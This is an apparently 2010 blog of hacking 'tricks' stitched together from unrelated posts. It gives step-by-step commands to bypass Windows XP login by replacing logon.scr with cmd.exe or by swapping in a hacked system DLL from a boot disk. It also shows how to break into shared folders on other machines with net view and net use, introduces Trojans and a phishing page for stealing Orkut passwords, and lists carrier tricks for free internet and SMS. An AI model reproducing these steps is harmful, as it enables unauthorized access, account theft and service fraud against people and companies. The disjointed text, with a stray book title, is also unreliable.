Sunday, October 31, 2010

Hack into a Windows XP




   1. Get physical access to the machine. Remember that it must have a CD or DVD drive.

   2. Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm

   3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.

   4. Use any burning program that can burn ISO images.

   5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.

   6. Press “R” to install DreamPackPL.

   7. Press “C” to install DreamPackPL by using the recovery console.

   8. Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)

   9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)

  10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)

step

Hack the Window XP Administrator Password .





 Hack the Window XP Administrator Password .

 

   1. Go to Start –> Run –> Type in CMD
   2. You will get a command prompt. Enter these commands the way it is given
   3. cd\
   4. cd\ windows\system32
   5. mkdir temphack
   6. copy logon.scr temphack\logon.scr
   7. copy cmd.exe temphack\cmd.exe
   8. del logon.scr
   9. rename cmd.exe logon.scr
  10. exit



De Hack or restore the Window XP Administrator Password

Saturday, October 30, 2010

HOW TO PROTECT YOURSELF






There is a saying that goes “Prevention is better than cure.”
After reading this manual hopefully you are looking for ways to
protect your privacy. Take it back from those who may invade it.
The individuals who are responsible for these attacks will always
prey off those who do not take an interest in defending their
privacy.
“Give a man a fish and he’ll eat for the day. Teach a man how to
fish and he’ll never starve.”
By showing you steps and procedures you can use to protect
your system from being hacked, you’ll quickly regain your sense
of security.

FIREWALLS

A firewall in layman terms is essentially a program which filters
network data to decide whether or not to forward them to their
destination or to deny it......

CRACKER




Crackers

For definition purposes I have included this term. This is
primarily the term given to individuals who are skilled at the art
of bypassing software copyright protection. They are usually
highly skilled in programming languages.
They are often confused with Hackers. As you can see they are
similar in their agenda. They both fight security of some kind,
but they are completely different “animals.”
Being able to attribute your attacks to the right type of attacker is
very important. By identifying your attacker to be either an
Anarchist Hacker or a Hacker you get a better idea of what you’re
up against.
“Know your enemy and know yourself and you will always be
victorious...”


who r hacker




I feel it is necessary to clarify the term hacker. Perhaps your
definition of a hacker has been influenced and tainted over the
years. There have been various computer related activities
attributed to the term “hacker”, but were greatly misunderstood.
Unfortunately for the people who are truly defined within the
underground tech world as a “hacker” this is an insult to them.
There are various types of “hackers”, each with their own
agenda. My goal is to help protect you from the worst of them.
Anarchist Hackers
These are the individuals who you should be weary of. Their sole
intent on system infiltration is to cause damage or use
information to create havoc. They are primarily the individuals
who are responsible for the majority of system attacks against
home users. They are more likely to be interested in what lies on
another person’s machine for example yours.
Mostly you’ll find that these individuals have slightly above
computer skill level and consider themselves hackers. They
glorify themselves on the accomplishments of others. Their idea
of classing themselves as a hacker is that of acquire programs
and utilities readily available on the net, use these programs with
no real knowledge of how these applications work and if they
manage to “break” into someone’s system class themselves as a
hacker. These individuals are called “Kiddie Hackers.”
They use these programs given to them in a malicious fashion on
anyone they can infect. They have no real purpose to what they
are doing except the fact of saying “Yeah! I broke into <insert
name here> computer!” It gives them bragging rights to their
friends.
If there is any damage to occur in a system being broken into
these individuals will accomplish it.
These individuals are usually high school students. They brag
about their accomplishments to their friends and try to build an
image of being hackers.

Hackers

A hacker by definition believes in access to free information.
They are usually very intelligent people who could care very little
about what you have on your system. Their thrill comes from
system infiltration for information reasons. Hackers unlike
“crackers and anarchist” know being able to break system
security doesn’t make you a hacker any more than adding 2+2
makes you a mathematician. Unfortunately, many journalists
and writers have been fooled into using the word ‘hacker.” They
have attributed any computer related illegal activities to the term
“hacker.”
Real hackers target mainly government institution. They believe
important information can be found within government
institutions. To them the risk is worth it. The higher the security
the better the challenge. The better the challenge the better they
need to be. Who’s the best keyboard cowboy? So to speak!
These individuals come in a variety of age classes. They range
from High School students to University Grads. They are quite
adept at programming and are smart enough to stay out of the
spotlight.
They don’t particularly care about bragging about their
accomplishments as it exposes them to suspicion. They prefer to
work from behind the scenes and preserve their anonymity.
Not all hackers are loners, often you’ll find they have a very tight
circle of associates, but still there is a level of anonymity between
them. An associate of mine once said to me “if they say they are
a hacker, then they’re not!”


warning




These are the file types by which images should come as.
Anything else should be unacceptable. There is no reason to
have an Image of any kind come as a .exe file. Don’t ever
accept the excuse that it’s an auto extracting image file!
READ ME AND TEXT FILES
Almost all program information documents on the net come in
one of these formats. These files are simply information
documents typed up in some word processing program or text
editor.




Some examples of their extensions are:
• DOC Document format for Microsoft Word, Word.
Example: (readme.doc)

 for details

THE TROJAN “HORSE”




 Trojan’s are
probably the most compromising of all types of attacks. Trojans
are being released by the hundreds every week, each more
cleverly designed that the other.  Trojans are small programs that effectively give
“hackers” remote control over your entire Computer.

Some common features with Trojans are as follows:
• Open your CD-Rom drive
• Capture a screenshot of your computer
• Record your key strokes and send them to the “Hacker”
• Full Access to all your drives and files
• Ability to use your computer as a bridge to do other
hacking related activities.
• Disable your keyboard
• Disable your mouse…and more!
Let’s take a closer look at a couple of more popular
Trojans:
• Netbus
• SubSeven
The Netbus Trojan has two parts to it as almost all Trojans do.
There is a Client and a Server. The server is the file that
would have to get installed on your system in order to have
your system compromised. Here’s how the hack would go.

The Hack

Objective: Getting the potential victim to install the server
onto his/her system.
Method 1(to hack)

SYSTEM INTRUSION IN 15 SECONDS




System intrusion in 15 seconds, that’s right it can be done. If
you possess certain security flaws your system can be broken
into in less that 15 seconds.
To begin this chapter I’d like you to do the following. Connect to
the Internet using your dial up account if you are on dial up. If
you are on dedicated service like High Speed connections (ie,
Cable and DSL) then just proceed with the steps below.

• Click Start
• Go to Run
• Click Run (It’s a step by step manual) :-)
• Type Winipcfg
• Hit the Enter Key
* For editorial reason the above info has been omitted *
What you should see under IP address is a number that looks
something like this.
207.175.1.1 (The number will be different.)
If you use Dial Up Internet Access then you will find your IP
address under PPP adapter. If you have dedicated access you
will find your IP address under another adapter name like (PCI
Busmaster, SMC Adapter, etc.) You can see a list by clicking
on the down arrow.
Once you have the IP address write it down, then close that
window by clicking (OK) and do the following.
• Click Start
• Go to Run (Click on Run)
• Type command then Click OK
At this point you should see a screen
Type the following at the Dos Prompt
• Nbtstat –A IP address
For example: nbtstat –A 207.175.1.1
(Please note that you must type the A in capitol letters.)

I’ll show you now how that information can be used to gain
access to your system.
A potential hacker would do a scan on a range of IP address for
systems with “File and Printer Sharing” turned on. Once they
have encountered a system with sharing turned on the next step
would be to find out what is being shared.
This is how:
Net view \\<insert ip_address here>
Our potential hacker would then get a response that looks
something like this.
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
The command was completed successfully.
This shows the hacker that his potential victim has their My
Documents Folder shared and their Temp directory shared. For
the hacker to then get access to those folders his next command
will be.
Net use x: \\<insert IP address here>\temp
If all goes well for the hacker, he/she will then get a response of
(The command was completed successfully.)
At this point the hacker now has access to the TEMP directory of
his victim.
Q. The approximate time it takes for the average hacker to do
this attack?
R. 15 seconds or less.

Monday, October 25, 2010

orkut hacking






Now a days The free recharge trick is spreading through the orkut(check it here)
.It is not the real and if you follow it will steal your password.
The basic thing with it is Phishing.
The java script they are given will send scrap to all your friends,testimonials,Change about me,status etc.
Now i am going to explain Phishing method for hacking orkut.It is very simple,follow below procedure and create your fake page today!

windows 7 keybord shorcut






It is great to learn about some Windows 7 keyboard shortcut in order to have greater control over the operating system and your computer.
>> You can dock the current using Windows to the left side of the screen through pressing Window key + Left arrow key.

>> Window key + Right arrow key helps you to dock the current using window to the right side of your screen.

>> You can easily maximize and even restore the foreground window by pressing Window key + upward key.

>> Windows key + downward key in order to minimize the activated window for the moment.

>> If you want to have smaller icons at the taskbar just like Vista then you can go to Taskbarright clickselect propertiescheck mark the ‘Use small icons’ optionthen alter the “Taskbar Buttons” option towards ‘Never combine.’

>> You can easily burn the ISO files yourself without making use of user grapples with applications of third party.

>> If you have multi-monitor set up for your computer then you can easily a shift one window screen to the other monitor by pressing Win key + SHIFT key + Left arrow key or Right arrow key.

>> Now you can add up a new font in your documents tools by downloading the font and then double clicking on it. It will show an install button along with it.

>> If you want to run some program with complete administrative rights then just hold the keys CTRL + SHIFT together by placing the option on to the application you want to open.

Saturday, October 23, 2010

free sms for vodafon 2010 trick




 The Adventures of Sherlock Holmes

hey friends




for vodafon user




get 7500 free sms only in 10 Rs for 15 day validity




top up at 15th day by 10 Rs top card




and increase sms validity for next 15 day



with 7.07 Rs




for this sms 10 to 144...


 



Tuesday, October 19, 2010

tatadocomo trick 2010




happy news for all now you can enjoy 5oomb free internet on tatadocomo



Sms WINDOWS to 54321
You will get 500 MB FREE for
6 MONTHS.....ENJOY..............................................

facebook trick for reliance airtel




u can use facebook free via

reliance, airtel, and videocon...

only enter the url     0.facebook.com

its free for these companies

donot open other sites because its will be charge except the above url

trick for 3g




hey i m using 2g sim as 3g

video calling, streaming , high downloading speed upto 3.02mbps

just in 2g price

2+Mbps & Unlimted Downloading = Rs 274/mo. posted by MOHAN JHA and co.. Req. Brand New BSNL 3G sim & 3G handset 1). Go to a BSNL outlet n ask for a 3G sim 2). Then recharge it with Rs. 120 in which u ll get Rs 20 balance & 6 month validity 3). Then convert it to 2G by recharging it with Rs. 2 4). Then activate Unlimited GPRS plan for 2G on ur card by recharging Rs. 274(or plan in which u get unlimited acc. to your state) Now in ur Handset set access point as bsnlnet n now use unlimited GPRS with speed of...




2010 tricks reliance free unlimited internet




STEPS :
1) download dotProxy.(uploaded here).
2) install Microsoft .NET Framework 3.5 SP1 ( essential)(direct download links given).
Or compact dotnet framework that uploaded here, check attachlist.
3) unzip the archive and run DotProxy.exe.
4) fill with following values local port :1234
remote proxy 10.239.221.22 or 10.239.221.5 port 8080
in url mod click add and type 0:id=jCustomerWAPProv for relience

for airtel & BSNL add 1:http://wap.indiatimes.com/usearch/ or 1:http://wap4.indiatimes.com/usearch/

2010 trick for free reliance




for reliance



just dial *123*099#



use free internet upto 2.5gb for one month


and

after one month again dail the above number and again enjoy free internet .......

Total Pageviews

Followers